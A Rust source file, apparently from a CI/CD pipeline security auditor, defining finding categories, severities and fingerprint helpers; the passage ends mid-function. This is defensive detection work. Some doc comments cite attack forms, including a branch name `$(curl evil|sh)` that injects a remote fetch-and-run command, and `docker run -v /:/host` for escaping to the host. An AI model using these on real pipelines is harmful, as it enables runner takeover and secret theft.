Skip to main content

taudit_core/
finding.rs

1use crate::graph::{AuthorityGraph, NodeId, NodeKind};
2use crate::propagation::PropagationPath;
3use serde::{Deserialize, Serialize};
4use sha2::{Digest, Sha256};
5use std::path::PathBuf;
6
7// ── Finding-output enhancements (v0.10) ────────────────────────────
8//
9// The blue-team corpus defense report (Section 3) recommends a small
10// set of additive `Finding` fields that consumers (SIEMs, dashboards,
11// triage queues) need but cannot derive cheaply. They are:
12//
13//   * `finding_group_id`       — stable UUID v5 over (namespace, fingerprint)
14//                                 so N hops against one secret cluster into
15//                                 a single advisory in downstream tooling.
16//   * `time_to_fix`             — coarse remediation effort enum so triage
17//                                 dashboards can sort by severity * effort.
18//   * `compensating_controls`   — human-readable list of detected controls
19//                                 that downgraded the finding's severity.
20//   * `suppressed`              — set by the `.taudit-suppressions.yml`
21//                                 applicator; preserves audit trail when a
22//                                 finding has been waived rather than fixed.
23//   * `original_severity`       — pre-downgrade severity; populated whenever
24//                                 the suppression applicator OR a compensating
25//                                 control modifies `severity`.
26//   * `suppression_reason`      — operator-supplied justification from the
27//                                 matching `.taudit-suppressions.yml` entry.
28//
29// All six fields live on `FindingExtras` and are flattened into JSON / SARIF
30// output via `#[serde(flatten)]`. New rules can populate them via
31// `Finding::with_time_to_fix(...)` / `Finding::with_compensating_controls(...)`
32// without touching the 31+ existing rule sites.
33
34#[derive(Debug, Clone, Copy, PartialEq, Eq, Hash, Serialize, Deserialize)]
35#[serde(rename_all = "snake_case")]
36pub enum Severity {
37    Critical,
38    High,
39    Medium,
40    Low,
41    Info,
42}
43
44impl Severity {
45    fn rank(self) -> u8 {
46        match self {
47            Severity::Critical => 0,
48            Severity::High => 1,
49            Severity::Medium => 2,
50            Severity::Low => 3,
51            Severity::Info => 4,
52        }
53    }
54}
55
56impl Ord for Severity {
57    fn cmp(&self, other: &Self) -> std::cmp::Ordering {
58        self.rank().cmp(&other.rank())
59    }
60}
61
62impl PartialOrd for Severity {
63    fn partial_cmp(&self, other: &Self) -> Option<std::cmp::Ordering> {
64        Some(self.cmp(other))
65    }
66}
67
68/// MVP categories (1-5) are derivable from pipeline YAML alone.
69/// Stretch categories (6-9) need heuristics or metadata enrichment.
70#[derive(Debug, Clone, Copy, PartialEq, Eq, Hash, Serialize, Deserialize)]
71#[serde(rename_all = "snake_case")]
72pub enum FindingCategory {
73    // MVP
74    AuthorityPropagation,
75    OverPrivilegedIdentity,
76    UnpinnedAction,
77    UntrustedWithAuthority,
78    ArtifactBoundaryCrossing,
79    // Stretch — implemented
80    FloatingImage,
81    LongLivedCredential,
82    /// Credential written to disk by a step (e.g. `persistCredentials: true` on a checkout).
83    /// Disk-persisted credentials are accessible to all subsequent steps and any process
84    /// with filesystem access, unlike runtime-only `HasAccessTo` authority.
85    PersistedCredential,
86    /// Dangerous trigger type (pull_request_target / pr) combined with secret/identity access.
87    TriggerContextMismatch,
88    /// Authority (secret/identity) flows into an opaque external workflow via DelegatesTo.
89    CrossWorkflowAuthorityChain,
90    /// Circular DelegatesTo chain — workflow calls itself transitively.
91    AuthorityCycle,
92    /// Privileged workflow (OIDC/broad identity) with no provenance attestation step.
93    UpliftWithoutAttestation,
94    /// Step writes to the environment gate ($GITHUB_ENV, pipeline variables) — authority can propagate.
95    SelfMutatingPipeline,
96    /// PR-triggered pipeline checks out the repository — attacker-controlled fork code lands on the runner.
97    CheckoutSelfPrExposure,
98    /// ADO variable group consumed by a PR-triggered job, crossing trust boundary.
99    VariableGroupInPrJob,
100    /// Self-hosted agent pool used in a PR-triggered job that also checks out the repository.
101    SelfHostedPoolPrHijack,
102    /// ADO self-hosted pool without workspace isolation (`clean: true`/`all`).
103    /// Shared self-hosted agents retain their workspace across pipeline runs.
104    /// Without `workspace: { clean: all }`, a PR build can deposit malicious
105    /// files that persist for the next (possibly privileged) pipeline run,
106    /// enabling workspace poisoning attacks.
107    SharedSelfHostedPoolNoIsolation,
108    /// Broad-scope ADO service connection reachable from a PR-triggered job without OIDC.
109    ServiceConnectionScopeMismatch,
110    /// ADO `resources.repositories[]` entry referenced by an `extends:`,
111    /// `template: x@alias`, or `checkout: alias` consumer resolves with no
112    /// `ref:` (default branch) or a mutable branch ref (`refs/heads/<name>`).
113    /// Whoever owns that branch can inject steps into the consuming pipeline.
114    TemplateExtendsUnpinnedBranch,
115    /// ADO `resources.repositories[]` entry pinned to a feature-class branch
116    /// (anything outside the `main` / `master` / `release/*` / `hotfix/*`
117    /// platform set). Feature branches typically have weaker push protection
118    /// than the trunk, so any developer with write access to that branch can
119    /// inject pipeline YAML that runs with the consumer's authority. Strictly
120    /// stronger signal than `template_extends_unpinned_branch` — co-fires.
121    TemplateRepoRefIsFeatureBranch,
122    /// Pipeline step uses an Azure VM remote-exec primitive (Set-AzVMExtension /
123    /// CustomScriptExtension, Invoke-AzVMRunCommand, az vm run-command, az vm extension set)
124    /// where the executed command line interpolates a pipeline secret or a SAS token —
125    /// pipeline-to-VM lateral movement primitive logged in plaintext to the VM and ARM.
126    VmRemoteExecViaPipelineSecret,
127    /// A SAS token freshly minted in-pipeline is interpolated into a CLI argument
128    /// (commandToExecute / scriptArguments / --arguments / -ArgumentList) instead of
129    /// passed via env var or stdin — argv ends up in /proc/*/cmdline, ETW, ARM status.
130    ShortLivedSasInCommandLine,
131    /// Pipeline secret value assigned to a shell variable inside an inline
132    /// script (`export VAR=$(SECRET)`, `$X = "$(SECRET)"`). Once the value
133    /// transits a shell variable, ADO's `$(SECRET)` log mask no longer
134    /// applies — transcripts (`Start-Transcript`, `bash -x`, terraform debug
135    /// logs) print the cleartext.
136    SecretToInlineScriptEnvExport,
137    /// Pipeline secret value written to a file under the agent workspace
138    /// (`$(System.DefaultWorkingDirectory)`, `$(Build.SourcesDirectory)`,
139    /// or relative paths) without `secureFile` task or chmod 600. The file
140    /// persists in the agent workspace and is uploaded by
141    /// `PublishPipelineArtifact` and crawlable by later steps.
142    SecretMaterialisedToWorkspaceFile,
143    /// PowerShell pulls a Key Vault secret with `-AsPlainText` (or
144    /// `ConvertFrom-SecureString -AsPlainText`, or older
145    /// `.SecretValueText` syntax) into a non-`SecureString` variable. The
146    /// value never traverses the ADO variable-group boundary, so verbose
147    /// Az/PS logging and error stack traces print the credential.
148    ///
149    /// Rule id is `keyvault_secret_to_plaintext` (single token "keyvault")
150    /// rather than the snake_case derivation `key_vault_…` — matches the
151    /// docs filename and the convention used in the corpus evidence.
152    #[serde(rename = "keyvault_secret_to_plaintext")]
153    KeyVaultSecretToPlaintext,
154    /// `terraform apply -auto-approve` against a production-named service connection
155    /// without an environment approval gate.
156    TerraformAutoApproveInProd,
157    /// `AzureCLI@2` task with `addSpnToEnvironment: true` AND an inline script —
158    /// the script can launder federated SPN/OIDC tokens into pipeline variables.
159    AddSpnWithInlineScript,
160    /// A `type: string` pipeline parameter (no `values:` allowlist) is interpolated
161    /// via `${{ parameters.X }}` into an inline shell/PowerShell script body —
162    /// shell injection vector for anyone with "queue build".
163    ParameterInterpolationIntoShell,
164    /// A `run:` block fetches a remote script from a mutable URL (`refs/heads/`,
165    /// `/main/`, `/master/`) and pipes it directly to a shell interpreter
166    /// (`curl … | bash`, `wget … | sh`, `bash <(curl …)`, `deno run https://…`).
167    /// Whoever controls that URL's content controls execution on the runner.
168    RuntimeScriptFetchedFromFloatingUrl,
169    /// Workflow trigger combines high-authority PR events
170    /// (`pull_request_target`, `issue_comment`, or `workflow_run`) with a step
171    /// whose `uses:` ref is a mutable branch/tag (not a 40-char SHA). Compromise
172    /// of the action's default branch yields full repo write on the target repo.
173    PrTriggerWithFloatingActionRef,
174    /// A `workflow_run`-triggered workflow captures a value from an external
175    /// API response (`gh pr view`, `gh api`, `curl api.github.com`) and writes
176    /// it into `$GITHUB_ENV`/`$GITHUB_OUTPUT`/`$GITHUB_PATH` without sanitisation.
177    /// A poisoned API field (branch name, title) injects environment variables
178    /// into every subsequent step in the same job.
179    UntrustedApiResponseToEnvSink,
180    /// A `pull_request`-triggered workflow logs into a container registry via a
181    /// floating (non-SHA-pinned) login action. The compromised action receives
182    /// OIDC tokens or registry credentials, and the workflow then pushes a
183    /// PR-controlled image to a shared registry.
184    PrBuildPushesImageWithFloatingCredentials,
185    /// First-party step writes a Secret/Identity-derived value into the
186    /// `$GITHUB_ENV` gate (or pipeline-variable equivalent) and a *later*
187    /// step in the same job that runs in `Untrusted` or `ThirdParty` trust
188    /// zone reads from the runner-managed env (`${{ env.X }}`). The two
189    /// component rules — `self_mutating_pipeline` (writer) and
190    /// `untrusted_with_authority` (consumer) — each see only half the
191    /// chain and emit no finding for the laundered consumer; this rule
192    /// closes the composition gap that R2 attack #3 exploited.
193    SecretViaEnvGateToUntrustedConsumer,
194    /// Positive-invariant rule (GHA): the workflow declares neither a
195    /// top-level nor a per-job `permissions:` block, leaving GITHUB_TOKEN at
196    /// its broad platform default. Fires once per workflow file.
197    NoWorkflowLevelPermissionsBlock,
198    /// Positive-invariant rule (ADO): a job referencing a production-named
199    /// service connection has no `environment:` binding, so it bypasses the
200    /// only ADO-side approval gate regardless of whether `-auto-approve` is
201    /// present. Strictly broader than `terraform_auto_approve_in_prod`.
202    ProdDeployJobNoEnvironmentGate,
203    /// Positive-invariant rule (cross-platform): a long-lived static
204    /// credential is in scope but the workflow does not currently use any
205    /// OIDC identity even though the target cloud supports federation.
206    /// Advisory uplift on top of `long_lived_credential` that wires the
207    /// existing `Recommendation::FederateIdentity` variant.
208    LongLivedSecretWithoutOidcRecommendation,
209    /// Positive-invariant rule (GHA): a PR-triggered workflow has multiple
210    /// privileged jobs where SOME have the standard fork-check `if:` and
211    /// OTHERS do not. Detects an intra-file inconsistency in defensive
212    /// posture — the org has the right instinct but applied it unevenly.
213    PullRequestWorkflowInconsistentForkCheck,
214    /// Positive-invariant rule (GitLab): a job with a production-named
215    /// `environment:` binding has no `rules:` / `only:` clause restricting
216    /// it to protected branches. Deploy job runs (or attempts to run) on
217    /// every pipeline trigger.
218    GitlabDeployJobMissingProtectedBranchOnly,
219    /// Two-step ADO chain: an inline script captures a `terraform output`
220    /// value (literal `terraform output` CLI invocation or a `$env:TF_OUT_*` /
221    /// `$TF_OUT_*` env var sourced from a Terraform CLI task) AND emits a
222    /// `##vso[task.setvariable variable=X;...]` directive setting that
223    /// captured value into pipeline variable `X`. A subsequent step in the
224    /// same job then expands `$(X)` in shell-expansion position
225    /// (`bash -c "..."`, `eval`, command substitution `$(...)`, PowerShell
226    /// `-split` / `Invoke-Command` / `Invoke-Expression`/`iex`, or as an
227    /// unquoted command word). The `task.setvariable` hop launders
228    /// attacker-controlled Terraform state — sourced from a remote backend
229    /// (S3 bucket, Azure Storage) that often has weaker access controls than
230    /// the pipeline itself — through pipeline-variable space and into a
231    /// shell interpreter.
232    TerraformOutputViaSetvariableShellExpansion,
233    /// GHA workflow declares a high-blast-radius trigger (`issue_comment`,
234    /// `pull_request_review`, `pull_request_review_comment`, `workflow_run`)
235    /// alongside write permissions or non-`GITHUB_TOKEN` secrets. Closes the
236    /// gap left by `trigger_context_mismatch` only firing on
237    /// `pull_request_target` / ADO `pr`.
238    RiskyTriggerWithAuthority,
239    /// A `jobs.<id>.outputs.<name>` value is sourced from `secrets.*`, an
240    /// OIDC-bearing step output, or has a credential-shaped name. Job outputs
241    /// flow unmasked through `needs.<job>.outputs.*` and are written to the
242    /// run log — masking is heuristic, never authoritative.
243    SensitiveValueInJobOutput,
244    /// A `workflow_dispatch.inputs.*` value flows into `curl` / `wget` /
245    /// `gh api` / a `run:` URL / `actions/checkout` `ref:`. Anyone with
246    /// dispatch permission can pivot the run to attacker-controlled refs or
247    /// hosts.
248    ManualDispatchInputToUrlOrCommand,
249    /// A reusable workflow call uses `secrets: inherit` while the caller is
250    /// triggered by an attacker-influenced event (`pull_request`,
251    /// `pull_request_target`, `issue_comment`, `workflow_run`). The whole
252    /// caller secret bag forwards to the callee regardless of what the callee
253    /// actually consumes — every transitive `uses:` in the called workflow
254    /// inherits the same scope.
255    SecretsInheritOverscopedPassthrough,
256    /// A `workflow_run`- or `pull_request_target`-triggered consumer
257    /// downloads an artifact from the originating run AND interprets that
258    /// artifact's content into a privileged sink (post-to-comment, write to
259    /// `$GITHUB_ENV`, `eval`, …). The producer ran in PR context, so a
260    /// malicious PR can write arbitrary content into the artifact while the
261    /// consumer holds upstream-repo authority.
262    UnsafePrArtifactInWorkflowRunConsumer,
263    /// A GitHub Actions `run:` block (or `actions/github-script` `script:` body)
264    /// interpolates an attacker-controllable expression — `${{ github.event.* }}`,
265    /// `${{ github.head_ref }}`, or `${{ inputs.* }}` from a privileged trigger
266    /// (`workflow_dispatch` / `workflow_run` / `issue_comment`) — directly into
267    /// the script text without first binding through an `env:` indirection.
268    /// Classic GitHub Actions remote-code-execution pattern.
269    ScriptInjectionViaUntrustedContext,
270    /// A workflow that holds non-`GITHUB_TOKEN` secrets or non-default
271    /// write permissions includes a step that uses an interactive debug action
272    /// (mxschmitt/action-tmate, lhotari/action-upterm, actions/tmate, …).
273    /// A maintainer flipping `debug_enabled=true` publishes the runner's full
274    /// environment over an external SSH endpoint.
275    InteractiveDebugActionInAuthorityWorkflow,
276    /// An `actions/cache` step keys the cache on a PR-derived expression
277    /// (`github.head_ref`, `github.event.pull_request.head.ref`, `github.actor`)
278    /// in a workflow that ALSO runs on `push: branches: [main]` — a PR can
279    /// poison the cache that the default-branch build later restores.
280    PrSpecificCacheKeyInDefaultBranchConsumer,
281    /// A `run:` step uses `gh ` / `gh api` with the default `GITHUB_TOKEN` to
282    /// perform a write-class action (`pr merge`, `release create/upload`,
283    /// `api -X POST/PATCH/PUT/DELETE` to `/repos/.../{contents,releases,actions/secrets,environments}`)
284    /// inside a workflow triggered by `pull_request`, `issue_comment`, or
285    /// `workflow_run` — runtime privilege escalation that static permission
286    /// checks miss.
287    GhCliWithDefaultTokenEscalating,
288    /// GitLab CI `$CI_JOB_TOKEN` (or `gitlab-ci-token:$CI_JOB_TOKEN`) used as a
289    /// bearer credential against an external HTTP API or fed to `docker login`
290    /// for `registry.gitlab.com`. CI_JOB_TOKEN's default scope (registry write,
291    /// package upload, project read) means a poisoned MR job that emits the
292    /// token to a webhook can pivot to package/registry pushes elsewhere.
293    CiJobTokenToExternalApi,
294    /// GitLab CI `id_tokens:` declares an `aud:` audience that is reused across
295    /// MR-context and protected-context jobs (no audience separation), or is a
296    /// wildcard / multi-cloud broker URL. The audience is what trades for
297    /// downstream cloud creds — a single shared `aud` means any job that
298    /// compromises the token assumes the most-privileged role any other job
299    /// uses.
300    IdTokenAudienceOverscoped,
301    /// Direct shell interpolation of attacker-controlled GitLab predefined
302    /// vars (`$CI_COMMIT_BRANCH`, `$CI_COMMIT_REF_NAME`, `$CI_COMMIT_TAG`,
303    /// `$CI_COMMIT_MESSAGE`, `$CI_COMMIT_TITLE`, `$CI_MERGE_REQUEST_TITLE`,
304    /// `$CI_MERGE_REQUEST_DESCRIPTION`,
305    /// `$CI_MERGE_REQUEST_SOURCE_BRANCH_NAME`, `$CI_COMMIT_AUTHOR`) into
306    /// `script:` / `before_script:` / `after_script:` / `environment:url:`
307    /// without single-quote isolation. A branch named `` $(curl evil|sh) ``
308    /// executes inside the runner. GitLab generalisation of the GHA
309    /// `script_injection_via_untrusted_context` class.
310    UntrustedCiVarInShellInterpolation,
311    /// A GitLab `include:` references (a) a `remote:` URL pointing at a
312    /// branch (`/-/raw/<branch>/...`), (b) a `project:` with `ref:` resolving
313    /// to a mutable branch name (main/master/develop), or (c) an include with
314    /// no `ref:` at all (defaults to HEAD). Whoever owns that branch can
315    /// backdoor every consumer's pipeline silently — included YAML executes
316    /// with the consumer's secrets and CI_JOB_TOKEN.
317    UnpinnedIncludeRemoteOrBranchRef,
318    /// A GitLab job declares a `services: [docker:*-dind]` sidecar AND holds
319    /// at least one non-CI_JOB_TOKEN secret (registry creds, deploy keys,
320    /// signing keys, vault id_tokens). docker-in-docker exposes the full
321    /// Docker socket inside the job container — a malicious build step can
322    /// `docker run -v /:/host` from inside dind and read the runner host
323    /// filesystem (other jobs' artifacts, cached creds).
324    DindServiceGrantsHostAuthority,
325    /// A GitLab job whose name or `extends:` matches scanner patterns
326    /// (`sast`, `dast`, `secret_detection`, `dependency_scanning`,
327    /// `container_scanning`, `gitleaks`, `trivy`, `grype`, `semgrep`, etc.)
328    /// runs with `allow_failure: true` AND has no `rules:` clause that
329    /// surfaces the failure. The pipeline goes green even when the scan
330    /// errors out — silent-pass is worse than no scan because reviewers trust
331    /// the badge.
332    SecurityJobSilentlySkipped,
333    /// A GitLab `trigger:` job (downstream / child pipeline) runs in
334    /// `merge_request_event` context OR uses `include: artifact:` from a
335    /// previous job (dynamic child pipeline). Dynamic child pipelines are a
336    /// code-injection sink — anything the build step writes to the artifact
337    /// runs as a real pipeline with the parent project's secrets.
338    ChildPipelineTriggerInheritsAuthority,
339    /// A GitLab `cache:` declaration whose `key:` is hardcoded, `$CI_JOB_NAME`
340    /// only, or `$CI_COMMIT_REF_SLUG` without a `policy: pull` restriction.
341    /// Caches are stored per-runner keyed by `key:`; a poisoned MR can push a
342    /// malicious `node_modules/` cache that the next default-branch job
343    /// downloads and executes during `npm install`.
344    CacheKeyCrossesTrustBoundary,
345    /// A CI script constructs an HTTPS git URL with embedded credentials
346    /// (`https://user:$TOKEN@host/...`) before invoking `git clone`,
347    /// `git push`, or `git remote set-url`. The credential is exposed
348    /// in the process argv (visible to `ps`, `/proc/*/cmdline`), persists
349    /// in `.git/config` for the rest of the job, and may be uploaded as
350    /// part of any artifact that bundles the workspace.
351    PatEmbeddedInGitRemoteUrl,
352    /// A CI job triggers a different project's pipeline via the GitLab
353    /// REST API using `CI_JOB_TOKEN` and forwards user-influenced variables
354    /// through the `variables[KEY]=value` query/form parameter. The
355    /// downstream project's security depends on the trust contract between
356    /// the two projects — variable values flowing across that boundary
357    /// constitute a cross-project authority bridge.
358    CiTokenTriggersDownstreamWithVariablePassthrough,
359    /// A GitLab job emits an `artifacts.reports.dotenv: <file>` artifact
360    /// whose contents become pipeline variables for any consumer linked
361    /// via `needs:` or `dependencies:`. A consumer in a later stage that
362    /// targets a production-named environment inherits those variables
363    /// transparently — no explicit download is visible at the job level.
364    /// When the producer reads attacker-influenced inputs (branch names,
365    /// commit messages), the dotenv flow is a covert privilege escalation
366    /// channel into the deployment job.
367    DotenvArtifactFlowsToPrivilegedDeployment,
368    /// ADO inline script sets a sensitive-named pipeline variable via
369    /// `##vso[task.setvariable variable=<NAME>]` with `issecret=false` or
370    /// without the `issecret` flag at all. Without `issecret=true` the
371    /// variable value is printed in plaintext to the pipeline log and is
372    /// not masked in downstream step output.
373    SetvariableIssecretFalse,
374    /// A GHA `uses:` action reference contains a non-ASCII character —
375    /// possible Unicode confusable / homoglyph impersonating a trusted
376    /// action (e.g. Cyrillic `a` instead of Latin `a`, or U+2215
377    /// DIVISION SLASH instead of U+002F SOLIDUS).
378    HomoglyphInActionRef,
379    // Reserved — requires ADO/GH API enrichment beyond pipeline YAML
380    /// Requires runtime network telemetry or policy enrichment — not detectable from YAML alone.
381    #[doc(hidden)]
382    EgressBlindspot,
383    /// Requires external audit-sink configuration data — not detectable from YAML alone.
384    #[doc(hidden)]
385    MissingAuditTrail,
386}
387
388/// Routing: scope findings -> TsafeRemediation; isolation findings -> CellosRemediation.
389#[derive(Debug, Clone, Serialize, Deserialize)]
390#[serde(tag = "type", rename_all = "snake_case")]
391pub enum Recommendation {
392    TsafeRemediation {
393        command: String,
394        explanation: String,
395    },
396    CellosRemediation {
397        reason: String,
398        spec_hint: String,
399    },
400    PinAction {
401        current: String,
402        pinned: String,
403    },
404    ReducePermissions {
405        current: String,
406        minimum: String,
407    },
408    FederateIdentity {
409        static_secret: String,
410        oidc_provider: String,
411    },
412    Manual {
413        action: String,
414    },
415}
416
417/// Provenance of a finding — distinguishes findings emitted by built-in
418/// taudit rules from findings emitted by user-loaded custom invariant YAML
419/// (`--invariants-dir`). Custom rules can emit arbitrarily-worded findings
420/// at any severity, so an operator piping output into a JIRA workflow or
421/// SARIF upload needs a non-spoofable signal of which file the rule came
422/// from. Serializes as `"built-in"` (string) for built-in findings and
423/// `{"custom": "<path>"}` for custom-rule findings — see
424/// `docs/finding-fingerprint.md` for the contract.
425#[derive(Debug, Clone, Default, PartialEq, Eq, Serialize, Deserialize)]
426#[serde(rename_all = "snake_case")]
427pub enum FindingSource {
428    /// Emitted by a built-in rule defined in `taudit-core::rules`. The
429    /// authoritative trust anchor — the binary's release commit defines the
430    /// rule logic. Serialises as the kebab-case string `"built-in"` to match
431    /// `schemas/finding.v1.json`.
432    #[default]
433    #[serde(rename = "built-in")]
434    BuiltIn,
435    /// Emitted by a custom invariant rule loaded from the given YAML file.
436    /// The path is the file the rule was loaded from, retained so operators
437    /// can audit which file produced any given finding.
438    Custom { source_file: PathBuf },
439}
440
441impl FindingSource {
442    /// True for findings emitted by built-in rules.
443    pub fn is_built_in(&self) -> bool {
444        matches!(self, FindingSource::BuiltIn)
445    }
446}
447
448/// Coarse-grained remediation effort. Surfaces in JSON `time_to_fix` and SARIF
449/// `properties.timeToFix` so triage dashboards can sort by `severity * effort`.
450///
451/// The four buckets are deliberately wide. Precise time estimates would invite
452/// argument; the buckets exist to separate "flip a flag" from "rewrite a job"
453/// from "renegotiate ops policy".
454///
455/// Per `MEMORY/.../blueteam-corpus-defense.md` Section 3 / Enhancement E-3.
456#[derive(Debug, Clone, Copy, PartialEq, Eq, Serialize, Deserialize)]
457#[serde(rename_all = "snake_case")]
458pub enum FixEffort {
459    /// ~5 minutes. Mechanical change to a single file (flip a flag, pin a SHA,
460    /// add a `permissions: {}` block). No structural risk.
461    Trivial,
462    /// ~1 hour. Refactor a step or job: split a script, add a fork-check,
463    /// move a secret to an environment binding.
464    Small,
465    /// ~1 day. Restructure a job or pipeline: introduce an environment gate,
466    /// move from inline scripts to a sandboxed action, add an OIDC role.
467    Medium,
468    /// ~1 week or more. Operational policy change: migrate from PATs to OIDC
469    /// across an org, change branch protection model, retire a service principal.
470    Large,
471}
472
473/// Optional finding metadata. Lives on every `Finding` via
474/// `#[serde(flatten)]` so consumers see the fields at the top of the
475/// finding object — same place they'd appear if declared inline on
476/// `Finding`. Default-constructed extras serialize to nothing (all
477/// `Option::None` and empty `Vec`s skip-serialize), so existing
478/// snapshots remain byte-stable until a rule populates a field.
479///
480/// **Why a wrapper struct?** The 30+ rule call sites use struct
481/// literal syntax. Adding fields directly to `Finding` would force
482/// every site to edit. With `extras: FindingExtras::default()`, new
483/// extras can be added in a single place.
484#[derive(Debug, Clone, Default, Serialize, Deserialize)]
485pub struct FindingExtras {
486    /// Stable UUID v5 over `(NAMESPACE, fingerprint)` — collapses
487    /// per-hop findings against the same authority root into one group
488    /// for SIEM display. See `compute_finding_group_id`.
489    #[serde(default, skip_serializing_if = "Option::is_none")]
490    pub finding_group_id: Option<String>,
491
492    /// Coarse remediation effort. See `FixEffort`.
493    #[serde(default, skip_serializing_if = "Option::is_none")]
494    pub time_to_fix: Option<FixEffort>,
495
496    /// Human-readable list of controls that already neutralise (or partially
497    /// neutralise) this finding — populated when a compensating-control
498    /// detector downgrades severity. Empty when no downgrade applied.
499    #[serde(default, skip_serializing_if = "Vec::is_empty")]
500    pub compensating_controls: Vec<String>,
501
502    /// Set to `true` by the suppression applicator when a matching
503    /// `.taudit-suppressions.yml` entry exists AND the configured mode
504    /// is `Suppress`. The finding still appears in output (audit trail
505    /// preserved) but consumers can filter on this field.
506    #[serde(default, skip_serializing_if = "is_false")]
507    pub suppressed: bool,
508
509    /// Original pre-downgrade severity. Populated by the suppression
510    /// applicator OR a compensating-control detector when `severity`
511    /// is mutated. `None` means the current severity is the rule-emitted
512    /// value.
513    #[serde(default, skip_serializing_if = "Option::is_none")]
514    pub original_severity: Option<Severity>,
515
516    /// Operator-supplied justification from the matching suppression
517    /// entry. `None` when no suppression applies.
518    #[serde(default, skip_serializing_if = "Option::is_none")]
519    pub suppression_reason: Option<String>,
520}
521
522#[allow(clippy::trivially_copy_pass_by_ref)]
523fn is_false(b: &bool) -> bool {
524    !*b
525}
526
527/// A finding is a concrete, actionable authority issue.
528#[derive(Debug, Clone, Serialize, Deserialize)]
529pub struct Finding {
530    pub severity: Severity,
531    pub category: FindingCategory,
532    #[serde(skip_serializing_if = "Option::is_none")]
533    pub path: Option<PropagationPath>,
534    pub nodes_involved: Vec<NodeId>,
535    pub message: String,
536    pub recommendation: Recommendation,
537    /// Provenance of this finding. Defaults to `BuiltIn` for backward
538    /// compatibility with code/JSON that predates the field — every
539    /// in-tree built-in rule sets this explicitly. Deserialization of older
540    /// JSON without the field treats the finding as built-in.
541    #[serde(default)]
542    pub source: FindingSource,
543    /// Optional metadata (group id, time-to-fix, compensating controls,
544    /// suppression markers). Flattens into the JSON object so consumers
545    /// see top-level fields — see `FindingExtras` for individual semantics.
546    #[serde(flatten, default)]
547    pub extras: FindingExtras,
548}
549
550impl Finding {
551    /// Builder helper: attach a `time_to_fix` annotation to this finding.
552    /// Call sites: `let f = Finding { ... }.with_time_to_fix(FixEffort::Trivial);`
553    pub fn with_time_to_fix(mut self, effort: FixEffort) -> Self {
554        self.extras.time_to_fix = Some(effort);
555        self
556    }
557
558    /// Builder helper: append a compensating control description and
559    /// downgrade severity by one tier (Critical -> High -> Medium -> Low -> Info).
560    /// Records the original severity so the audit trail survives.
561    pub fn with_compensating_control(mut self, control: impl Into<String>) -> Self {
562        let original = self.severity;
563        self.extras.compensating_controls.push(control.into());
564        self.severity = downgrade_severity(self.severity);
565        if self.extras.original_severity.is_none() {
566            self.extras.original_severity = Some(original);
567        }
568        self
569    }
570}
571
572/// Move severity one rank toward `Info` (Critical -> High -> ... -> Info).
573/// `Info` stays `Info`. Used by both the suppression applicator and
574/// compensating-control detectors.
575pub fn downgrade_severity(s: Severity) -> Severity {
576    match s {
577        Severity::Critical => Severity::High,
578        Severity::High => Severity::Medium,
579        Severity::Medium => Severity::Low,
580        Severity::Low => Severity::Info,
581        Severity::Info => Severity::Info,
582    }
583}
584
585/// Stable UUID v5 over the finding fingerprint. Two findings whose
586/// fingerprints match (same rule + file + root authority) produce the
587/// same `finding_group_id` — that is the whole point: SIEMs and triage
588/// dashboards collapse N hops against a single secret into one row.
589///
590/// The UUID v5 namespace is a fixed UUID v4 derived once and embedded
591/// here. Treating the namespace as load-bearing is intentional: any
592/// future change here would break every consumer that has stored a
593/// `finding_group_id`. Bump only at a major version.
594pub fn compute_finding_group_id(fingerprint: &str) -> String {
595    // UUID v5 = SHA-1(namespace || name), with version + variant bits set.
596    // Implemented inline so taudit-core stays free of the `uuid` crate
597    // dependency (workspace already depends on it from the CLI; core
598    // remains zero-IO and minimal).
599    const NAMESPACE: [u8; 16] = [
600        0x6c, 0x6f, 0xd0, 0xa3, 0x82, 0x44, 0x4f, 0x29, 0xb1, 0x9a, 0x09, 0xc8, 0x7e, 0x49, 0x55,
601        0x21,
602    ];
603
604    use sha1::{Digest as Sha1Digest, Sha1};
605    let mut hasher = Sha1::new();
606    Sha1Digest::update(&mut hasher, NAMESPACE);
607    Sha1Digest::update(&mut hasher, fingerprint.as_bytes());
608    let hash = hasher.finalize();
609
610    let mut bytes = [0u8; 16];
611    bytes.copy_from_slice(&hash[..16]);
612    // RFC 4122 §4.3: set version to 5 (bits 12-15 of time_hi_and_version)
613    bytes[6] = (bytes[6] & 0x0f) | 0x50;
614    // RFC 4122 §4.4: set variant to RFC 4122 (bits 6-7 of clock_seq_hi)
615    bytes[8] = (bytes[8] & 0x3f) | 0x80;
616
617    format!(
618        "{:02x}{:02x}{:02x}{:02x}-{:02x}{:02x}-{:02x}{:02x}-{:02x}{:02x}-{:02x}{:02x}{:02x}{:02x}{:02x}{:02x}",
619        bytes[0], bytes[1], bytes[2], bytes[3],
620        bytes[4], bytes[5],
621        bytes[6], bytes[7],
622        bytes[8], bytes[9],
623        bytes[10], bytes[11], bytes[12], bytes[13], bytes[14], bytes[15],
624    )
625}
626
627// ── Finding fingerprint ────────────────────────────────────
628//
629// Stable cross-run identifier for a finding. Surfaces in:
630//
631//   * SARIF `partialFingerprints[primaryLocationLineHash]`
632//   * JSON  `findings[].fingerprint`
633//   * CloudEvents extension attribute `tauditfindingfingerprint`
634//
635// SIEMs / suppression DBs / dedup pipelines key on this value to
636// recognise "same finding seen on previous run". See
637// `docs/finding-fingerprint.md` for the full contract.
638
639/// Pull a custom-rule id out of a finding message of the form
640/// `[<id>] rest of message`. Returns `None` if the message does not start
641/// with a bracketed id. Mirrors the matching helper in
642/// `taudit-report-sarif`; kept private so the surface stays minimal.
643fn extract_custom_rule_id(message: &str) -> Option<&str> {
644    if !message.starts_with('[') {
645        return None;
646    }
647    let end = message.find(']')?;
648    let id = &message[1..end];
649    if id.is_empty() {
650        None
651    } else {
652        Some(id)
653    }
654}
655
656/// Snake-case rule id derived from a `FindingCategory`. Delegates to
657/// serde so the value tracks the serialized form across renames.
658fn category_rule_id(category: &FindingCategory) -> String {
659    serde_json::to_value(category)
660        .ok()
661        .and_then(|v| v.as_str().map(str::to_string))
662        .unwrap_or_else(|| "unknown".to_string())
663}
664
665/// Public, stable rule-id resolver for a finding.
666///
667/// Returns the snake_case rule id reported alongside this finding. When the
668/// finding's message starts with a bracketed custom-rule prefix
669/// (`[my_rule] ...`), the bracketed id wins so custom YAML rules surface
670/// their declared id. Otherwise the rule id is the snake_case form of the
671/// finding's `category` (the same string serde uses to serialize the
672/// category enum).
673///
674/// JSON, SARIF, and CloudEvents emitters all share this helper to ensure
675/// the `rule_id` field is identical across the three sinks.
676pub fn rule_id_for(finding: &Finding) -> String {
677    extract_custom_rule_id(&finding.message)
678        .map(str::to_string)
